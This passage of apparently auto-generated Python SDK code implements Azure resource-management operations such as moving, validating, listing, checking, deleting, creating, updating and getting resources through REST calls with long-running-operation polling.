url = self.move_resources.metadata['url']
path_format_arguments = {
'sourceResourceGroupName': self._serialize.url("source_resource_group_name", source_resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'ResourcesMoveInfo')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def move_resources(
self, source_resource_group_name, resources=None, target_resource_group=None, custom_headers=None, raw=False, polling=True, **operation_config):
"""Moves resources from one resource group to another resource group.
The resources to move must be in the same source resource group. The
target resource group may be in a different subscription. When moving
resources, both the source group and the target group are locked for
the duration of the operation. Write and delete operations are blocked
on the groups until the move completes. .
:param source_resource_group_name: The name of the resource group
containing the resources to move.
:type source_resource_group_name: str
:param resources: The IDs of the resources.
:type resources: list[str]
:param target_resource_group: The target resource group.
:type target_resource_group: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._move_resources_initial(
source_resource_group_name=source_resource_group_name,
resources=resources,
target_resource_group=target_resource_group,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
move_resources.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{sourceResourceGroupName}/moveResources'}
def _validate_move_resources_initial(
self, source_resource_group_name, resources=None, target_resource_group=None, custom_headers=None, raw=False, **operation_config):
parameters = models.ResourcesMoveInfo(resources=resources, target_resource_group=target_resource_group)
# Construct URL
url = self.validate_move_resources.metadata['url']
path_format_arguments = {
'sourceResourceGroupName': self._serialize.url("source_resource_group_name", source_resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'ResourcesMoveInfo')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def validate_move_resources(
self, source_resource_group_name, resources=None, target_resource_group=None, custom_headers=None, raw=False, polling=True, **operation_config):
"""Validates whether resources can be moved from one resource group to
another resource group.
This operation checks whether the specified resources can be moved to
the target. The resources to move must be in the same source resource
group. The target resource group may be in a different subscription. If
validation succeeds, it returns HTTP response code 204 (no content). If
validation fails, it returns HTTP response code 409 (Conflict) with an
error message. Retrieve the URL in the Location header value to check
the result of the long-running operation.
:param source_resource_group_name: The name of the resource group
containing the resources to validate for move.
:type source_resource_group_name: str
:param resources: The IDs of the resources.
:type resources: list[str]
:param target_resource_group: The target resource group.
:type target_resource_group: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._validate_move_resources_initial(
source_resource_group_name=source_resource_group_name,
resources=resources,
target_resource_group=target_resource_group,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
validate_move_resources.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{sourceResourceGroupName}/validateMoveResources'}
def list(
self, filter=None, expand=None, top=None, custom_headers=None, raw=False, **operation_config):
"""Get all the resources in a subscription.
:param filter: The filter to apply on the operation.<br><br>The
properties you can use for eq (equals) or ne (not equals) are:
location, resourceType, name, resourceGroup, identity,
identity/principalId, plan, plan/publisher, plan/product, plan/name,
plan/version, and plan/promotionCode.<br><br>For example, to filter by
a resource type, use: $filter=resourceType eq
'Microsoft.Network/virtualNetworks'<br><br>You can use
substringof(value, property) in the filter. The properties you can use
for substring are: name and resourceGroup.<br><br>For example, to get
all resources with 'demo' anywhere in the name, use:
$filter=substringof('demo', name)<br><br>You can link more than one
substringof together by adding and/or operators.<br><br>You can filter
by tag names and values. For example, to filter for a tag name and
value, use $filter=tagName eq 'tag1' and tagValue eq 'Value1'. When
you filter by a tag name and value, the tags for each resource are not
returned in the results.<br><br>You can use some properties together
when filtering. The combinations you can use are: substringof and/or
resourceType, plan and plan/publisher and plan/name, identity and
identity/principalId.
:type filter: str
:param expand: The $expand query parameter. You can expand createdTime
and changedTime. For example, to expand both properties, use
$expand=changedTime,createdTime
:type expand: str
:param top: The number of results to return. If null is passed,
returns all resource groups.
:type top: int
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of GenericResource
:rtype:
~azure.mgmt.resource.resources.v2019_08_01.models.GenericResourcePaged[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
if top is not None:
query_parameters['$top'] = self._serialize.query("top", top, 'int')
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.GenericResourcePaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list.metadata = {'url': '/subscriptions/{subscriptionId}/resources'}
def check_existence(
self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, custom_headers=None, raw=False, **operation_config):
"""Checks whether a resource exists.
:param resource_group_name: The name of the resource group containing
the resource to check. The name is case insensitive.
:type resource_group_name: str
:param resource_provider_namespace: The resource provider of the
resource to check.
:type resource_provider_namespace: str
:param parent_resource_path: The parent resource identity.
:type parent_resource_path: str
:param resource_type: The resource type.
:type resource_type: str
:param resource_name: The name of the resource to check whether it
exists.
:type resource_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: bool or ClientRawResponse if raw=true
:rtype: bool or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.check_existence.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'resourceProviderNamespace': self._serialize.url("resource_provider_namespace", resource_provider_namespace, 'str'),
'parentResourcePath': self._serialize.url("parent_resource_path", parent_resource_path, 'str', skip_quote=True),
'resourceType': self._serialize.url("resource_type", resource_type, 'str', skip_quote=True),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.head(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [204, 404]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = (response.status_code == 204)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
check_existence.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}'}
def _delete_initial(
self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'resourceProviderNamespace': self._serialize.url("resource_provider_namespace", resource_provider_namespace, 'str'),
'parentResourcePath': self._serialize.url("parent_resource_path", parent_resource_path, 'str', skip_quote=True),
'resourceType': self._serialize.url("resource_type", resource_type, 'str', skip_quote=True),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes a resource.
:param resource_group_name: The name of the resource group that
contains the resource to delete. The name is case insensitive.
:type resource_group_name: str
:param resource_provider_namespace: The namespace of the resource
provider.
:type resource_provider_namespace: str
:param parent_resource_path: The parent resource identity.
:type parent_resource_path: str
:param resource_type: The resource type.
:type resource_type: str
:param resource_name: The name of the resource to delete.
:type resource_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
resource_provider_namespace=resource_provider_namespace,
parent_resource_path=parent_resource_path,
resource_type=resource_type,
resource_name=resource_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}'}
def _create_or_update_initial(
self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, parameters, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.create_or_update.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'resourceProviderNamespace': self._serialize.url("resource_provider_namespace", resource_provider_namespace, 'str'),
'parentResourcePath': self._serialize.url("parent_resource_path", parent_resource_path, 'str', skip_quote=True),
'resourceType': self._serialize.url("resource_type", resource_type, 'str', skip_quote=True),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'GenericResource')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 201, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('GenericResource', response)
if response.status_code == 201:
deserialized = self._deserialize('GenericResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update(
self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
"""Creates a resource.
:param resource_group_name: The name of the resource group for the
resource. The name is case insensitive.
:type resource_group_name: str
:param resource_provider_namespace: The namespace of the resource
provider.
:type resource_provider_namespace: str
:param parent_resource_path: The parent resource identity.
:type parent_resource_path: str
:param resource_type: The resource type of the resource to create.
:type resource_type: str
:param resource_name: The name of the resource to create.
:type resource_name: str
:param parameters: Parameters for creating or updating the resource.
:type parameters:
~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns GenericResource or
ClientRawResponse<GenericResource> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
resource_provider_namespace=resource_provider_namespace,
parent_resource_path=parent_resource_path,
resource_type=resource_type,
resource_name=resource_name,
parameters=parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('GenericResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}'}
def _update_initial(
self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, parameters, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.update.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'resourceProviderNamespace': self._serialize.url("resource_provider_namespace", resource_provider_namespace, 'str'),
'parentResourcePath': self._serialize.url("parent_resource_path", parent_resource_path, 'str', skip_quote=True),
'resourceType': self._serialize.url("resource_type", resource_type, 'str', skip_quote=True),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'GenericResource')
# Construct and send request
request = self._client.patch(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('GenericResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update(
self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
"""Updates a resource.
:param resource_group_name: The name of the resource group for the
resource. The name is case insensitive.
:type resource_group_name: str
:param resource_provider_namespace: The namespace of the resource
provider.
:type resource_provider_namespace: str
:param parent_resource_path: The parent resource identity.
:type parent_resource_path: str
:param resource_type: The resource type of the resource to update.
:type resource_type: str
:param resource_name: The name of the resource to update.
:type resource_name: str
:param parameters: Parameters for updating the resource.
:type parameters:
~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns GenericResource or
ClientRawResponse<GenericResource> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_initial(
resource_group_name=resource_group_name,
resource_provider_namespace=resource_provider_namespace,
parent_resource_path=parent_resource_path,
resource_type=resource_type,
resource_name=resource_name,
parameters=parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('GenericResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}'}
def get(
self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, custom_headers=None, raw=False, **operation_config):
"""Gets a resource.
:param resource_group_name: The name of the resource group containing
the resource to get. The name is case insensitive.
:type resource_group_name: str
:param resource_provider_namespace: The namespace of the resource
provider.
:type resource_provider_namespace: str
:param parent_resource_path: The parent resource identity.
:type parent_resource_path: str
:param resource_type: The resource type of the resource.
:type resource_type: str
:param resource_name: The name of the resource to get.
:type resource_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: GenericResource or ClientRawResponse if raw=true
:rtype:
~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'resourceProviderNamespace': self._serialize.url("resource_provider_namespace", resource_provider_namespace, 'str'),
'parentResourcePath': self._serialize.url("parent_resource_path", parent_resource_path, 'str', skip_quote=True),
'resourceType': self._serialize.url("resource_type", resource_type, 'str', skip_quote=True),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('GenericResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}'}
def check_existence_by_id(
self, resource_id, custom_headers=None, raw=False, **operation_config):
"""Checks by ID whether a resource exists.
:param resource_id: The fully qualified ID of the resource, including
the resource name and resource type. Use the format,
/subscriptions/{guid}/resourceGroups/{resource-group-name}/{resource-provider-namespace}/{resource-type}/{resource-name}
:type resource_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: bool or ClientRawResponse if raw=true
:rtype: bool or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.check_existence_by_id.metadata['url']
path_format_arguments = {
'resourceId': self._serialize.url("resource_id", resource_id, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.head(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [204, 404]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = (response.status_code == 204)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
check_existence_by_id.metadata = {'url': '/{resourceId}'}
def _delete_by_id_initial(
self, resource_id, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete_by_id.metadata['url']
path_format_arguments = {
'resourceId': self._serialize.url("resource_id", resource_id, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete_by_id(
self, resource_id, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes a resource by ID.
:param resource_id: The fully qualified ID of the resource, including
the resource name and resource type. Use the format,
/subscriptions/{guid}/resourceGroups/{resource-group-name}/{resource-provider-namespace}/{resource-type}/{resource-name}
:type resource_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_by_id_initial(
resource_id=resource_id,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete_by_id.metadata = {'url': '/{resourceId}'}
def _create_or_update_by_id_initial(
self, resource_id, parameters, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.create_or_update_by_id.metadata['url']
path_format_arguments = {
'resourceId': self._serialize.url("resource_id", resource_id, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'GenericResource')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 201, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('GenericResource', response)
if response.status_code == 201:
deserialized = self._deserialize('GenericResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update_by_id(
